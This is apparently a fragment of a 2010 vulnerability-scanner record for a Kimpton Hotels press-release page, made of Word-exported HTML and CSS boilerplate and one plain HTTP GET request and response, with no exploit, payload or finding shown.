<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2010-06-16T00:00:00Z</o:LastPrinted> <o:Created>2010-06-16T00:01:00Z</o:Created> <o:LastSaved>2010-06-16T00:01:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>922</o:Words> <o:Characters>5259</o:Characters> <o:Lines>43</o:Lines> <o:Paragraphs>10</o:Paragraphs> <o:CharactersWithSpaces>6458</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:77; mso-generic-font-family:modern; mso-font-format:other; mso-font-pitch:fixed; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:77; mso-generic-font-family:roman; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:28848037; mso-list-type:hybrid; mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Symbol;}@list l2:level2 {mso-level-tab-stop:1.25in; mso-level-number-position:left; margin-left:1.25in; text-indent:-.25in;}@list l2:level3 {mso-level-tab-stop:1.75in; mso-level-number-position:left; margin-left:1.75in; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.25in; mso-level-number-position:left; margin-left:2.25in; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.75in; mso-level-number-position:left; margin-left:2.75in; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.25in; mso-level-number-position:left; margin-left:3.25in; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.75in; mso-level-number-position:left; margin-left:3.75in; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.25in; mso-level-number-position:left; margin-left:4.25in; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.75in; mso-level-number-position:left; margin-left:4.75in; text-indent:-.25in;}@list l3 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l5:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l8 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l10:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:lef..
- /pdfs/press/html/Honor-Roll-0810/index.html

/pdfs/press/html/Honor-Roll-0810/index.html

http://www.kimptonhotels.com/pdfs/press/html/Honor-Roll-0810/index.html

Request

GET /pdfs/press/html/Honor-Roll-0810/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 36160
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>3</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2010-04-23T00:57:00Z</o:LastPrinted> <o:Created>2010-08-09T19:42:00Z</o:Created> <o:LastSaved>2010-08-09T19:42:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>763</o:Words> <o:Characters>4353</o:Characters> <o:Lines>36</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5345</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Arial-BoldMT; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:Arial; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-format:other; mso-font-pitch:auto; mso-font-signature:50331648 0 0 0 16777216 0;}@font-face {font-family:ArialMT; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:Arial; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-format:other; mso-font-pitch:auto; mso-font-signature:50331648 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; 